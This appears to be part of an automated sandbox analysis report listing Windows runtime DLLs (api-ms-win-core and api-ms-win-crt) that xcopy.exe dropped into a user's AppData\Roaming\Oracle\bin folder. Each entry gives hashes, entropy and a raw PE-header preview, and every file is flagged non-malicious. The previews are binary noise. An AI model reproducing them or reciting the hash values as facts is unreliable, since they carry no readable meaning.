                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):20792
                                                                                                                                                                                              Entropy (8bit):7.089032314841867
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                                                                                                                                                                                              MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                                                                                                                                                                                              SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                                                                                                                                                                                              SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                                                                                                                                                                                              SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18744
                                                                                                                                                                                              Entropy (8bit):7.101895292899441
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                                                                                                                                                                                              MD5:D500D9E24F33933956DF0E26F087FD91
                                                                                                                                                                                              SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                                                                                                                                                                                              SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                                                                                                                                                                                              SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18232
                                                                                                                                                                                              Entropy (8bit):7.16337963516533
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                                                                                                                                                                                              MD5:6F6796D1278670CCE6E2D85199623E27
                                                                                                                                                                                              SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                                                                                                                                                                                              SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                                                                                                                                                                                              SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):19248
                                                                                                                                                                                              Entropy (8bit):7.073730829887072
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                                                                                                                                                                                              MD5:5F73A814936C8E7E4A2DFD68876143C8
                                                                                                                                                                                              SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                                                                                                                                                                                              SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                                                                                                                                                                                              SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):19392
                                                                                                                                                                                              Entropy (8bit):7.082421046253008
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                                                                                                                                                                                              MD5:A2D7D7711F9C0E3E065B2929FF342666
                                                                                                                                                                                              SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                                                                                                                                                                                              SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                                                                                                                                                                                              SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18744
                                                                                                                                                                                              Entropy (8bit):7.1156948849491055
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                                                                                                                                                                                              MD5:D0289835D97D103BAD0DD7B9637538A1
                                                                                                                                                                                              SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                                                                                                                                                                                              SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                                                                                                                                                                                              SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):17712
                                                                                                                                                                                              Entropy (8bit):7.187691342157284
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                                                                                                                                                                                              MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                                                                                                                                                                                              SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                                                                                                                                                                                              SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                                                                                                                                                                                              SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):17720
                                                                                                                                                                                              Entropy (8bit):7.19694878324007
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                                                                                                                                                                                              MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                                                                                                                                                                                              SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                                                                                                                                                                                              SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                                                                                                                                                                                              SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18232
                                                                                                                                                                                              Entropy (8bit):7.137724132900032
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                                                                                                                                                                                              MD5:12CC7D8017023EF04EBDD28EF9558305
                                                                                                                                                                                              SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                                                                                                                                                                                              SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                                                                                                                                                                                              SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):20280
                                                                                                                                                                                              Entropy (8bit):7.04640581473745
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                                                                                                                                                                                              MD5:71AF7ED2A72267AAAD8564524903CFF6
                                                                                                                                                                                              SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                                                                                                                                                                                              SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                                                                                                                                                                                              SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18744
                                                                                                                                                                                              Entropy (8bit):7.138910839042951
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                                                                                                                                                                                              MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                                                                                                                                                                                              SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                                                                                                                                                                                              SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                                                                                                                                                                                              SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):19248
                                                                                                                                                                                              Entropy (8bit):7.072555805949365
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                                                                                                                                                                              MD5:19A40AF040BD7ADD901AA967600259D9
                                                                                                                                                                                              SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                                                                                                                                                                              SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                                                                                                                                                                              SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18224
                                                                                                                                                                                              Entropy (8bit):7.17450177544266
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                                                                                                                                                                              MD5:BABF80608FD68A09656871EC8597296C
                                                                                                                                                                                              SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                                                                                                                                                                              SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                                                                                                                                                                              SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18232
                                                                                                                                                                                              Entropy (8bit):7.1007227686954275
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                                                                                                                                                                                              MD5:0F079489ABD2B16751CEB7447512A70D
                                                                                                                                                                                              SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                                                                                                                                                                                              SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                                                                                                                                                                                              SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):19256
                                                                                                                                                                                              Entropy (8bit):7.088693688879585
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                                                                                                                                                                                              MD5:6EA692F862BDEB446E649E4B2893E36F
                                                                                                                                                                                              SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                                                                                                                                                                                              SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                                                                                                                                                                                              SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):22328
                                                                                                                                                                                              Entropy (8bit):6.929204936143068
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                                                                                                                                                                                              MD5:72E28C902CD947F9A3425B19AC5A64BD
                                                                                                                                                                                              SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                                                                                                                                                                                              SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                                                                                                                                                                                              SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18736
                                                                                                                                                                                              Entropy (8bit):7.078409479204304
